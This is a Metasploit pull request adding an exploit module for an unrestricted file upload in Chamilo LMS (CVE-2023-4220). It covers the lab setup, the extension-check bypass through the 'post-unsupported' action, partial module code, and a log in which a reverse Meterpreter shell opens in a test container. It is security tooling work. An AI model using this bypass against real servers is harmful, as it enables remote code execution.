### PR TITLE
Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220)

### LINKED ISSUE #19631: Chamilo v1.11.24 Unrestricted File Upload PHP Webshell
## Summary
In versions prior to <= v1.11.24  a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter `action` is set to `post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded

### Basic example

https://github.com/H4cking4All/CVE-2023-4220/tree/main

### PR DESCRIPTION
**Pull request by jheysel-r7**
Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24 a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter `action` is set to `post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded to: `/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist by default.

### Setup

A vulnerable docker-compose configuration can be found at the following link: https://github.com/vulhub/vulhub/pull/559
1. Clone the repo `git clone https://github.com/vulhub/vulhub.git` 
1. Checkout the pull request mentioned above: `git checkout CVE-2023-4220`
1. Run `cd vulhub/chamilo/CVE-2023-4220`
1. Start the environment: `docker compose up`
1. Navigate to `http://127.0.0.1:8080` to complete the installation wizard. 
1. Note when filling out the database IP address and credentials - the DB hostname is the name of the container which is 
`mariadb` (not `localhost` or `127.0.0.1`). 
1. Once the installation wizard is complete the target should be ready to be
exploited with the module. This container has the non-default `/files/` directory created already. 

### Verification 
List the steps needed to make sure this thing works

1. Start msfconsole
1. Do: `use linux/http/chamilo_bigupload_webshell`
1. Set the `RHOST`, `RPORT`, and `LHOST` options
1. Run the module
1. Receive a Meterpreter session as the `www-data` user.

### CODE REVIEW

File: modules/exploits/linux/http/chamilo_bigupload_webshell.rb [hunk 1]
```diff
@@ -0,0 +1,118 @@
...
+    vars_form_data = [
+      {
+        'name' => 'bigUploadFile',
+        'data' => file_contents,
+        'filename' => file_name,
+        'mime_type' => 'application/octet-stream'
+      }
+    ]
+
+    register_file_for_cleanup(file_name)
```
Comment (smcintyre-r7) [inline modules/exploits/linux/http/chamilo_bigupload_webshell.rb:90]: Should this be moved to be after we know that the file has been successfully uploaded?

File: modules/exploits/linux/http/chamilo_bigupload_webshell.rb [hunk 2]
```diff
@@ -0,0 +1,118 @@
...
+
+    begin
+      upload_file(file_contents, file_name)
+    rescue UploadFileError => e
+      fail_with(Failure::UnexpectedReply, "#{e.class}:#{e}")
+    end
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => "/main/inc/lib/javascript/bigupload/files/#{file_name}"
```
Comment (smcintyre-r7) [inline modules/exploits/linux/http/chamilo_bigupload_webshell.rb:115]: Looks like this is missing a `normalize_uri` call here. Also given hat we're executing the payload, should here be some kind of a check done on the result? Something to ensure that the HTTP server responded at least would be a good idea.

```suggestion
      'uri' => normalize_uri('/main/inc/lib/javascript/bigupload/files', file_name)
```

**Review by dledda-r7 — APPROVED** [review]
Looks good!
```
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
rport => 8080
msf6 exploit(linux/http/chamilo_bigupload_webshell) > exploit

[*] Started reverse TCP handler on 172.21.111.143:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
[*] Sending stage (40004 bytes) to 172.18.0.3
[+] Deleted D73uPl0z
[+] Deleted DEyYYuoivfzUFvHx.php
[*] Meterpreter session 1 opened (172.21.111.143:4444 -> 172.18.0.3:48560) at 2024-12-04 07:50:01 -0500


meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 345de2434c3a
OS          : Linux 345de2434c3a 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
Meterpreter : php/linux
meterpreter > ls
No entries exist in /var/www/chamilo/main/inc/lib/javascript/bigupload/files
meterpreter > 
```

**Comment by dledda-r7** [comment]
# Release Notes
This adds an exploit module for Chamilo LMS, where versions prior to <= v1.11.24, a webshell can be uploaded via the bigload.php endpoint allowing remote code execution on the context of `www-data`.

**Review by earacicotjr-star — COMMENTED** [review]
I have...

File: modules/exploits/linux/http/chamilo_bigupload_webshell.rb (hunk 1 above)
Comment (earacicotjr-star) [reply modules/exploits/linux/http/chamilo_bigupload_webshell.rb]: Gotcha

File: modules/exploits/linux/http/chamilo_bigupload_webshell.rb (hunk 2 above)
Comment (earacicotjr-star) [reply modules/exploits/linux/http/chamilo_bigupload_webshell.rb]: Reached out

**Pull request merged**